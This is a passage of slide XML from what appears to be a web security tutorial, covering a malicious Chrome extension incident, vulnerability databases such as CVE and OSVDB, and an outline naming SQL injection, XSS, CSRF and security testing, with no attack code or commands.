              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>users in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-8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Brazil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8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Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Malicious 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Chrome </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>extension </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>blame</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-26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(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>BREX_KILIM.LL</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>)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9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11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extension</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-3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includes</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-8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script</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10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code</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-6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that</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-8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prevents</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="298450" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="297815" algn="l"/>
                <a:tab pos="299085" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>removal </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-21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plugin</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="298450" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="297815" algn="l"/>
                <a:tab pos="299085" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>access to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>antivirus</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-21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websites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071104" y="606551"/>
            <a:ext cx="1380744" cy="110642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620000" y="2133600"/>
            <a:ext cx="1828800" cy="139522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9855">
              <a:lnSpc>
                <a:spcPts val="1425"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
              <a:rPr dirty="0"/>
              <a:t>12</a:t>
            </a:fld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275329" y="629665"/>
            <a:ext cx="350774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More list </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>incidents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9855">
              <a:lnSpc>
                <a:spcPts val="1425"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
              <a:rPr dirty="0"/>
              <a:t>13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1070102" y="1460245"/>
            <a:ext cx="6991350" cy="49796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6385" marR="130810" indent="-273685">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="94230"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="287020" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Common </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Vulnerabilities </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Exposures</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-254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(CVE)  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://cve.mitre.org</a:t>
            </a:r>
            <a:endParaRPr sz="26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buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="3800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" marR="43180" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="94230"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="287020" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Open </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Source </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Vulnerability </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Database</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-254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(OSVDB),  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://osvdb.org</a:t>
            </a:r>
            <a:endParaRPr sz="26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Clr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="3750">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="286385" marR="5080" indent="-273685">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="94230"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="287020" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Web‐Application </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Security </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Consortium</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-125" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-40" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>(WASC)  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>http://www.webappsec.org/projects/whid/</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="927100" lvl="1" indent="-247015">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="515"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009DD9"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="927100" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-3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method</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="927100" lvl="1" indent="-247015">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009DD9"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="927100" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Outcome</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="927100" lvl="1" indent="-247015">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009DD9"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="927100" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Location</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="927100" lvl="1" indent="-247015">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009DD9"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="927100" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr sz="20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198623" y="769111"/>
            <a:ext cx="566166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What </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t>wrong </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>in these</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="35" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t>programs?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9855">
              <a:lnSpc>
                <a:spcPts val="1425"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
              <a:rPr dirty="0"/>
              <a:t>14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17702" y="1500632"/>
            <a:ext cx="7581265" cy="227838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87020" marR="763270" indent="-274320">
              <a:lnSpc>
                <a:spcPts val="2590"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="425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60" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>application implementation </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>browsing</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-28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of  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>applications need </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>be </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>tested</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-280" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>well</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="652145" marR="226060" lvl="1" indent="-246379">
              <a:lnSpc>
                <a:spcPts val="2160"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="505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Security</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-114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vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-6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mitigations</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-4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in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-55" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>pre</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-85" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF33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and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>post</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-95" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill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deployment  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>phases</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="652145" lvl="1" indent="-246379">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="209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5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Check that </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>programs </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>cannot </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>be </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>exploited </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>with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malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-35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inputs</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="652145" marR="101600" lvl="1" indent="-246379">
              <a:lnSpc>
                <a:spcPts val="2160"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="509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20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Trusting </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>browser </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>plugins and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>extensions, allow </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>them</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-320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accessing  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>sensitive</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-95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resources</a:t>
            </a:r>
            <a:endParaRPr sz="20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606800" y="692911"/>
            <a:ext cx="254000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35" dirty="0"/>
              <a:t>Tutorial</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>outline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9855">
              <a:lnSpc>
                <a:spcPts val="1425"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
              <a:rPr dirty="0"/>
              <a:t>15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1146302" y="1460888"/>
            <a:ext cx="4782820" cy="3977640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="6921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545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Part </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Common </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>application</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-28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vulnerability</a:t>
            </a:r>
            <a:endParaRPr sz="18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395"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0F6FC6"/>
              </a:buClr>
              <a:buSzPct val="84375"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="652145" algn="l"/>
                <a:tab pos="652780" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-40" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Injection</a:t>
            </a:r>
            <a:endParaRPr sz="16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385"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0F6FC6"/>
              </a:buClr>
              <a:buSzPct val="84375"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="652145" algn="l"/>
                <a:tab pos="652780" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>XSS,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="420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Part</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-4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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>II</a:t>
            </a:r>
            <a:endParaRPr sz="18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395"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0F6FC6"/>
              </a:buClr>
              <a:buSzPct val="84375"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="652145" algn="l"/>
                <a:tab pos="652780" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-40" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-110" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>testing</a:t>
            </a:r>
            <a:endParaRPr sz="16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385"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0F6FC6"/>
              </a:buClr>
              <a:buSzPct val="84375"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="652145" algn="l"/>
                <a:tab pos="652780" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Testing </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>technique</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="420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Part</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-4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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>III</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
